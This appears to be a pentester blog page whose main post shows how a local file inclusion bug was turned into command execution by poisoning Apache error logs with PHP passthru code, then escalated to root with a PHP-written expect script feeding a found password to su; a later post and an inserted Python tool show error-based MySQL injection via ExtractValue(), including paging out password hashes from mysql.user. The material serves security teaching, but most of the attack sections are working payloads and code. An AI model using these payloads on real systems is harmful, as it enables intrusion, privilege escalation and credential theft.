www.notsosecure.com

From Pentesters To Pentesters

Recently on a pentest I came across an interesting local file inclusion (LFI) vulnerability. On this occasion it was definitely not an RFI: all I could do was include files from the local application server.

E.g. http://vulnsite.com?exec=aaa/../../../../../etc/passwd%00aa

returned the /etc/passwd file. The trailing %00 is there because the application appends its own suffix to the parameter; the NUL byte truncates the string before that suffix is reached (a PHP behaviour that was fixed in 5.3.4). The application server was running as the 'apache' user, which did not have permission to read /etc/shadow or to do anything "interesting".
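To make the mechanics of that URL concrete, here is an added Python example (not from the original post, which shows only the URL): it mimics how a PHP include() of the form include("pages/" . $_GET['exec'] . ".php") on PHP before 5.3.4 ends up opening /etc/passwd, and a resolver that rejects the same input. The include pattern, the pages directory and the allow-list are assumptions for illustration, not details from the engagement.

```python
"""Added example: how a NUL byte plus "../" turns a PHP include() into a
file read, and a resolver that rejects the same input. Not code from the
original post; the vulnerable include pattern is an assumption."""
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed vulnerable pattern (not shown in the post):
#   include("/var/www/app/pages/" . $_GET['exec'] . ".php");
# Before PHP 5.3.4 the file name reached the C-level open() as a
# NUL-terminated string, so everything after %00, the forced ".php"
# suffix included, was dropped, and "../" climbed out of PAGES_DIR.
PAGES_DIR = "/var/www/app/pages"               # assumed location
ALLOWED_PAGES = {"home", "about", "contact"}   # assumed allow-list


def vulnerable_resolve(exec_param: str) -> str:
    """Return the path the vulnerable include() actually opens."""
    raw = unquote(exec_param)               # %00 -> "\x00", as in PHP's $_GET
    path = PAGES_DIR + "/" + raw + ".php"   # suffix was meant to pin the extension
    path = path.split("\x00", 1)[0]         # C-string truncation at the NUL byte
    return posixpath.normpath(path)         # ".." segments resolved by the lookup


def hardened_resolve(exec_param: str) -> Optional[str]:
    """Allow-list the page name and confirm the final path stays in PAGES_DIR."""
    raw = unquote(exec_param)
    if "\x00" in raw or raw not in ALLOWED_PAGES:
        return None
    path = posixpath.normpath(posixpath.join(PAGES_DIR, raw + ".php"))
    # Containment check kept even though the allow-list already rules out "..":
    # a later change that loosens the allow-list should not reopen the traversal.
    if not path.startswith(PAGES_DIR + "/"):
        return None
    return path


if __name__ == "__main__":
    payload = "aaa/../../../../../etc/passwd%00aa"   # the request from the post
    print(vulnerable_resolve(payload))   # /etc/passwd
    print(hardened_resolve(payload))     # None
    print(hardened_resolve("home"))      # /var/www/app/pages/home.php
```

The hardened version does not try to sanitise the path; it refuses anything outside a fixed allow-list and still checks the final path as a second line of defence. PHP 5.3.4 and later reject NUL bytes in include() paths, but plain "../" traversal still works wherever the suffix can be guessed or is absent, so the allow-list is the part that matters.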

Code Execution:

There are quite a few good articles on the internet on how to get code execution from an LFI. Essentially, you insert PHP code into a file the web server can read and then include that file. These files typically are:

Apache access logs
Apache error logs
/proc/self/environ

etc.

On this occasion the 'apache' user could read the error logs. So, when you request a URI such as:

http://vuln.com/foo%3c%3fphp%20passthru('id')%20%3f%3e

Apache writes a line along these lines to its error log (the error log records the decoded path of the missing file, which is why the PHP tags arrive intact; the access log keeps the request line URL-encoded, so poisoning it is normally done through a header such as User-Agent instead):

404 file not found foo<?php passthru('id');?>

Now include the error log through the LFI and the PHP in it runs, giving OS command execution as the 'apache' user:

http://vulnsite.com?exec=aaa/../../../../../usr/local/apache/logs/error_logs%00a

Getting Root:

On this occasion I was lucky and spotted a file containing a clear-text root password. However, getting root still wasn't easy, as I could not find an easy way to feed this password to su from within the PHP script (su reads the password from the terminal, not from stdin). In the end, after quite a bit of searching, I found a way to do it with expect, using the following one line of PHP:

<?php passthru('echo -e \'#!/usr/bin/expect -f\nset password [lrange $argv 0 0]; set cmd [lrange $argv 1 1];set timeout -1; spawn su -c "$cmd" ;match_max 100000 ;expect "*?assword:*"; send -- "$password\r"; send -- "\r"; expect eof\'>/tmp/su.exp && /usr/bin/expect /tmp/su.exp passw0rd whoami>>/tmp/out.txt');?>

This one-liner does the following:
1. creates an expect script (/tmp/su.exp) that takes the root (su) password and the command to execute as arguments, spawns su -c "<command>", waits for the password prompt and types the password;
2. runs the expect script (the && makes sure the file is fully written first) with the root password and the command to run as root, appending the output to /tmp/out.txt.

One thing to check: passthru() hands the command to /bin/sh. The echo -e form works when that is bash; where /bin/sh is dash, "-e" is printed literally as part of the first line and expect will choke on it, so use printf to write the script instead.

Enjoy the root privileges!
P.S. It is quite common to find expect installed on *nix application servers.

Here are my slides from Blackhat 2010.

——————————————————————-
Videos:

Demo 1:

Demo 2:

Demo 3:

Demo 4:

The new version of bsqlbf is now available for download. The new addition is the ability to execute any Metasploit payload after obtaining OS command execution on an Oracle database server, by exploiting SQL injection from the web application.

Project Homepage

Video

A colleague of mine (Aleks) forwarded me a Russian presentation on exploiting SQL injection:

http://devteev.blogspot.com/2009/10/advanced-sql-injection-lab-full-pack.html

Of all the slides, I particularly liked the one in which the author shows that if MySQL error messages are displayed (for example because the application prints mysql_error()), then data can be retrieved from the back-end database through the ExtractValue() function. MySQL reports an invalid XPath expression back verbatim in the error text, so the value you want is concatenated behind 0x5c (a backslash, which makes the XPath invalid) and read straight out of the error:
——————————————
> SELECT 1 AND ExtractValue(1, CONCAT(0x5c, (SELECT @@VERSION)))

produces:

Error Code : 1105
XPATH syntax error: '\5.1.44-community'

———————-
This should not be confused with PHP errors. While PHP errors are usually enabled, it is not very common to see developers printing the MySQL errors with mysql_error(). Still, it is good to know and can sometimes come in handy.
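As an added example (not part of the post or the linked slides), the Python below shows what a practitioner builds on top of that one slide: it parses the leaked value out of a mysql_error() string and pages a longer value out 31 characters at a time, because MySQL prints only the first 32 characters of the bad XPath expression and one of those is the leading backslash. The AND-context injection point, the fake error oracle standing in for the target and the sample password hash are constructed for the example.

```python
"""Added example: reading data through MySQL ExtractValue() XPath errors,
including paging around the 32-character limit of the error text. Not code
from the post or the linked slides; the injection context, the fake error
oracle and the sample values are constructed."""
import re
from typing import Callable, Optional

# MySQL echoes the offending XPath expression in the error, but only its
# first 32 characters. One of those is the leading backslash (0x5c) that
# makes the expression invalid, so each request leaks at most 31 characters.
ERROR_WIDTH = 32
SLICE = ERROR_WIDTH - 1
ERR_RE = re.compile(r"XPATH syntax error: '\\([^']*)'")


def build_payload(expr: str, offset: int) -> str:
    """Injection fragment for an AND-context point (assumed); MID() selects
    the slice of the subquery result that this request should leak."""
    return (f"1 AND ExtractValue(1, CONCAT(0x5c, "
            f"MID(({expr}), {offset}, {SLICE})))")


def extract_from_error(error_text: str) -> Optional[str]:
    """Pull the leaked slice out of a page that echoes mysql_error()."""
    m = ERR_RE.search(error_text)
    return m.group(1) if m else None


def dump_value(expr: str, send: Callable[[str], str]) -> str:
    """Page the value of `expr` out SLICE characters at a time. `send` takes
    one injected payload and returns the response body."""
    out, offset = "", 1
    while True:
        chunk = extract_from_error(send(build_payload(expr, offset)))
        if chunk is None or len(chunk) < SLICE:
            # No error at all: the page is not printing mysql_error().
            # A short slice: we have reached the end of the value.
            return out + (chunk or "")
        out += chunk
        offset += SLICE


def fake_mysql_error(payload: str, secret: str) -> str:
    """Constructed stand-in for the target: evaluates only the MID() asked
    for in the payload and applies MySQL's 32-character cut to the error."""
    m = re.search(r"MID\(\(.*\), (\d+), (\d+)\)\)\)$", payload)
    start, length = int(m.group(1)), int(m.group(2))
    leaked = "\\" + secret[start - 1:start - 1 + length]
    return f"Error Code : 1105\nXPATH syntax error: '{leaked[:ERROR_WIDTH]}'"


if __name__ == "__main__":
    version = "5.1.44-community"                              # value from the slide
    creds = "root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B"  # constructed, 46 chars
    print(dump_value("SELECT @@VERSION", lambda p: fake_mysql_error(p, version)))
    print(dump_value("SELECT CONCAT(user,0x3a,password) FROM mysql.user LIMIT 1",
                     lambda p: fake_mysql_error(p, creds)))
```

Against a real target, `send` would be the HTTP request that puts the payload into the vulnerable parameter and returns the body; everything else stays the same. The loop also doubles as the check the post describes: if the first request comes back with no XPATH error in the body, the application is not echoing mysql_error() and this channel is closed.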

Overall, very nice presentation.

This year I will be talking at Blackhat and Defcon. The talk is titled "Hacking Oracle From Web Apps". The details about the talk can be found here. I am also releasing a small teaser video of the new bsqlbf version, which I will be releasing soon. See you in Vegas!

Link to the video